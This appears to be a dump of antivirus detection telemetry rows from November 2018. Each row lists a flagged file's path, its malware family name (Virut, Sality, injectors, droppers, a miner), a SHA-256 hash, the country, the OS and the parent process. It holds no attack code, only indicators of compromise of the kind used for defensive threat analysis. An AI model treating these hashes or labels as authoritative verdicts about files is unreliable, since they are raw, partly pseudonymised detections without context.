  Row(detection=Row(filename='avscan-20181102-051832-b63e9a24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051832-B63E9A24', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T06:41:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055752-34d3980d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055752-34D3980D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062213-9b53697b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062213-9B53697B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054347-3cfbee39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054347-3CFBEE39', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7a4205509f5c95df84746c969fbc464b569103d10cdadb44d33ba281c9d94098', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-3\\7A4205509F5C95DF84746C969FBC464B569103D10CDADB44D33BA281C9D94098', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7a4205509f5c95df84746c969fbc464b569103d10cdadb44d33ba281c9d94098', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:12:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054119-e4d21d56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054119-E4D21D56', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054854-f43d3748', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054854-F43D3748', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061515-a2602c66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061515-A2602C66', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054120-e59fa6b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054120-E59FA6B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053850-8be0230e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053850-8BE0230E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052556-bec62735', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052556-BEC62735', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055849-566b8634', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055849-566B8634', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062140-88180d86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062140-88180D86', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055824-480a6ea1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055824-480A6EA1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T21:57:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051317-fa217ea8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051317-FA217EA8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054304-237c2e9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054304-237C2E9C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053714-52ffa208', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053714-52FFA208', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060214-d1240520', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060214-D1240520', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062137-85e42a22', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062137-85E42A22', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053335-d03a7954', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053335-D03A7954', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T10:38:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051131-badb082c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051131-BADB082C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054439-5bec0e28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054439-5BEC0E28', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='z-enemy.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\z-enemy.1-22-cuda10.0_x32\\z-enemy.exe', filesize=13120000, name='HEUR/AGEN.1033252.#M1.#R1'), hash='2fceedab18e5468969fc4112ba2f5b78caf66cbaa0db75bf9779955a54076c32', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:56:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-13-32-37.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-30T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T07:42:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cat.exe', filepath='C:\\Users\\X\\Documents\\National Instruments\\Circuit Design Suite 12.0\\codemodl\\USER\\CAT.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='0d0649f7dfc5dd8d852dc8a00b5509ac9c3e9745261a2930cd73d13e80072b53', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe28_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe28 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:21:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='20fbb335951938f7fb69a4e1e6837a044b085ec9426b2f75bd532b16f80a4ed0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries29.10.2018-25.categorizing\\20FBB335951938F7FB69A4E1E6837A044B085EC9426B2F75BD532B16F80A4ED0', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='20fbb335951938f7fb69a4e1e6837a044b085ec9426b2f75bd532b16f80a4ed0', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T09:02:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='in_flac.dll', filepath='C:\\program files (x86)\\Winamp\\Plugins\\in_flac.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='474bf9b658f1a024044a0fbfcfcad245cc620266643b05412249d4afac532a22', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T07:07:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe468_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe468 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T04:09:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T00:21:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='training 2016.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\RPG\\JADWAL TRAINING 2016\\TRAINING 2016.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k secsvcs', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T10:02:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-083328-821efe6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dbed97bb\\AVSCAN-20181101-083316-7FB2D686\\AVSCAN-20181101-083328-821EFE6C', filesize=576000, name='TR/Miner.syyzh.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:33:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155013-874cb083', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155013-874CB083', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nc 30.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\AUDIT\\Suggestion Corrective Action\\GSM\\CAP GSM\\NC 30\\NC 30.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151946-12370c59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151312-DB3E0F68\\AVSCAN-20181101-151946-12370C59', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:38:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe556_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe556 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:06:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='1d563aca47ba0cb20387b3d8ccb65eda25a431b4b466711f0ee07f42f6785a79', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0259e185938b1783d31e6a8167c82e8359e8396bb1aba634027c6164f436e2b7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-4\\0259E185938B1783D31E6A8167C82E8359E8396BB1ABA634027C6164F436E2B7', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='0259e185938b1783d31e6a8167c82e8359e8396bb1aba634027c6164f436e2b7', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-8.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-9.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-31.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T10:54:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='white oil.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\LPA WHITE OIL\\WHITE OIL.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:21:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155107-905f797b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155107-905F797B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T15:16:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='4344a01d1f8bbf144ed969434fa83349d9e50e2c14ea2c6411af6b31b57b7462', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b0469e6812e239a47caef5a5e475244e2d101c572bedfdebad412bb855409143', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B0469E6812E239A47CAEF5A5E475244E2D101C572BEDFDEBAD412BB855409143', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b0469e6812e239a47caef5a5e475244e2d101c572bedfdebad412bb855409143', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:28:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jh.exe', filepath='e:\\documents and settings\\X\\application data\\disscouuntexteonsii\\Jh.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:36:40Z'), dt=datetime.date(2018, 11, 1)),
